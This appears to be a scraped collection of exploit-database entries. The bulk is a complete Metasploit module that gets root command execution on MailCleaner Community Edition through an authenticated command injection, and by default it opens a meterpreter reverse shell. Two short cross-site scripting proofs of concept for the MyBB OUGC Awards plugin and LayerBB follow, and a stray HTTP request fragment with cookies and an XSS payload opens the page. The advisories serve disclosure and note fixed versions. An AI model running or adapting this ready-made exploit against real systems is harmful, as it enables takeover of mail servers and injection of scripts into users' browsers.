cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540
cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6
cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6

message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Mailcleaner Remote Code Execution",
      'Description'    => %q{
        This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an
        operating system command under the context of the web server user which is root.

        /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
        operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => true,
          'WfsDelay' => 5,
          'Payload'  => 'python/meterpreter/reverse_tcp'
        },
      'Platform'       => ['python', 'unix'],
      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
      'Targets'        =>
        [
          [
            'Python payload',
            {
              'Platform' => 'python',
              'Arch' => ARCH_PYTHON,
            }
          ],
          [
            'Command payload',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
              {
                'BadChars' => "\x26",
              }
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 19 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password to login with'])
      ]
    )
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def auth
    print_status('Performing authentication...')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'admin/')
    })

    if res && !res.get_cookies.empty?
      cookie = res.get_cookies
    else
      fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.')
    end

    # Performing authentication
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'admin/'),
      'cookie'    => cookie,
      'vars_post' => {
        'username'  => username,
        'password' => password,
        'submit' => 'Log+in'
      }
    })

    if res && res.code == 302
      print_good("Awesome..! Authenticated with #{username}:#{password}")
    else
      fail_with(Failure::NoAccess, 'Credentials are not valid.')
    end

    cookie
  end

  def exploit
    cookie = auth

    if cookie.nil?
      fail_with(Failure::Unknown, 'Something went wrong!')
    end

    print_status('Exploiting command injection flaw')

    if target['Arch'] == ARCH_PYTHON
      cmd = "';$(python -c \"#{payload.encoded}\");#"
    else
      cmd = "';#{payload.encoded};#"
    end

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
      'cookie'    => cookie,
      'vars_post' => {
        'search' => rand_text_alpha(5),
        'domain' => cmd,
        'submit' => 1
      }
    })

  end
end
HireHackking 
# Exploit Title: MyBB OUGC Awards Plugin v1.8.3 - Cross-Site Scripting
# Date: 12/31/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=396
# Version: 1.8.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-3501


1. Description:
OUGC Awards plugin for MyBB forum allows admins and moderators to grant awards to users which displays on profiles/posts. The reason input isn't sanitized on awards page and user profiles.
 

2. Proof of Concept:

- Have a mod account level or higher
- Go to Manage Awards in ModCP
- Give an award to a user and input payload for reason   <script>alert('XSS')</script>

- Payload executes when viewing award on awards.php and user profiles.


3. Solution:
Update to 1.8.19
HireHackking 
# Exploit Title: LayerBB 1.1.1 - Cross-Site Scripting
# Date: 10/4/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=26
# Version: 1.1.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-17997


1. Description:
LayerBB is a free open-source forum software. The XSS found allows users to add a payload to the title of conversations (PMs).
 

2. Proof of Concept:

- Start a new conversation sending to any user (victim) you want
- Use a payload in the title  <script>alert('XSS')</script>
- Next time the user (victim) visits the site payload will execute


3. Solution:
Update to 1.1.2